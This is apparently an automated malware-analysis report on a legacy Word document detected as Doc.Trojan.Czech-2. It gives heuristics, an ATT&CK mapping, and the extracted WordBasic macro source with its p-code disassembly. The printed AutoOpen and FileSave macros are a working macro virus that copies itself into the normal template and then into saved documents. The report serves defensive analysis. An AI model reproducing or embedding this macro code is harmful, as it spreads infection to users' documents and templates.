MALICIOUS
200
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The file is a legacy Word document containing WordBasic macros, specifically an AutoOpen macro. This macro is designed to copy itself and other macros to the normal template, which is a common technique for establishing persistence or preparing for further malicious actions. The presence of legacy WordBasic and the ClamAV detection signature 'Doc.Trojan.Czech-2' strongly suggest malicious intent.
Heuristics 4
-
ClamAV: Doc.Trojan.Czech-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Czech-2
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3658 bytes |
SHA-256: 25c2dde6aa4ee0866d23905d2e289ec1f1c894b1aeec03a6d25224c055a2baa6 |
|||
|
Detection
ClamAV:
Doc.Trojan.Czech-2
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "AutoOpen"
Public Sub MAIN()
Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileSummaryInfo(False)
WordBasic.CurValues.FileSummaryInfo dlg
WordBasic.MacroCopy dlg.FileName + ":AutoOpen", "normal:AutoOpen"
WordBasic.MacroCopy dlg.FileName + ":FileSave", "normal:FileSave"
End Sub
Attribute VB_Name = "FileSave"
Public Sub MAIN()
Attribute MAIN.VB_Description = "Ulozí aktivní dokument nebo šablonu."
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FileSave.MAIN"
Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileSaveAs(False)
On Error GoTo -1: On Error GoTo ErrorHandler
WordBasic.FileSave
WordBasic.CurValues.FileSaveAs dlg
If dlg.Format = 0 Then
dlg.Format = 1
WordBasic.FileSaveAs dlg
WordBasic.MacroCopy "normal:AutoOpen", dlg.Name + ":AutoOpen"
WordBasic.MacroCopy "normal:FileSave", dlg.Name + ":FileSave"
End If
ErrorHandler:
Select Case Err.Number
Case 102 'Input box was canceled
Case Else 'Any other error condition
End Select
End Sub
' Processing file: /opt/analyzer/scan_staging/c081998e006c42c5a841ca8a6e845e8a.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 965 bytes
' Macros/VBA/AutoOpen - 1704 bytes
' Line #0:
' Line #1:
' FuncDefn (Public Sub MAIN())
' Line #2:
' Dim
' VarDefn dlg (As Object)
' BoS 0x0000
' SetStmt
' LitVarSpecial (False)
' Ld WordBasic
' MemLd DialogRecord
' ArgsMemLd FileSummaryInfo 0x0001
' Set dlg
' Line #3:
' Ld dlg
' Ld WordBasic
' MemLd CurValues
' ArgsMemCall FileSummaryInfo 0x0001
' Line #4:
' Ld dlg
' MemLd FileName
' LitStr 0x0009 ":AutoOpen"
' Add
' LitStr 0x000F "normal:AutoOpen"
' Ld WordBasic
' ArgsMemCall MacroCopy 0x0002
' Line #5:
' Ld dlg
' MemLd FileName
' LitStr 0x0009 ":FileSave"
' Add
' LitStr 0x000F "normal:FileSave"
' Ld WordBasic
' ArgsMemCall MacroCopy 0x0002
' Line #6:
' EndSub
' Macros/VBA/FileSave - 1935 bytes
' Line #0:
' Line #1:
' FuncDefn (Public Sub MAIN())
' Line #2:
' Dim
' VarDefn dlg (As Object)
' BoS 0x0000
' SetStmt
' LitVarSpecial (False)
' Ld WordBasic
' MemLd DialogRecord
' ArgsMemLd FileSaveAs 0x0001
' Set dlg
' Line #3:
' OnError <crash>
' BoS 0x0000
' OnError ErrorHandler
' Line #4:
' Ld WordBasic
' ArgsMemCall FileSave 0x0000
' Line #5:
' Ld dlg
' Ld WordBasic
' MemLd CurValues
' ArgsMemCall FileSaveAs 0x0001
' Line #6:
' Ld dlg
' MemLd Format$
' LitDI2 0x0000
' Eq
' IfBlock
' Line #7:
' LitDI2 0x0001
' Ld dlg
' MemSt Format$
' Line #8:
' Ld dlg
' Ld WordBasic
' ArgsMemCall FileSaveAs 0x0001
' Line #9:
' LitStr 0x000F "normal:AutoOpen"
' Ld dlg
' MemLd New
' LitStr 0x0009 ":AutoOpen"
' Add
' Ld WordBasic
' ArgsMemCall MacroCopy 0x0002
' Line #10:
' LitStr 0x000F "normal:FileSave"
' Ld dlg
' MemLd New
' LitStr 0x0009 ":FileSave"
' Add
' Ld WordBasic
' ArgsMemCall MacroCopy 0x0002
' Line #11:
' EndIfBlock
' Line #12:
' Label ErrorHandler
' Line #13:
' Ld Err
' MemLd Number
' SelectCase
' Line #14:
' LitDI2 0x0066
' Case
' CaseDone
' QuoteRem 0x0010 0x0016 "Input box was canceled"
' Line #15:
' CaseElse
' QuoteRem 0x0010 0x0019 "Any other error condition"
' Line #16:
' EndSelect
' Line #17:
' EndSub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.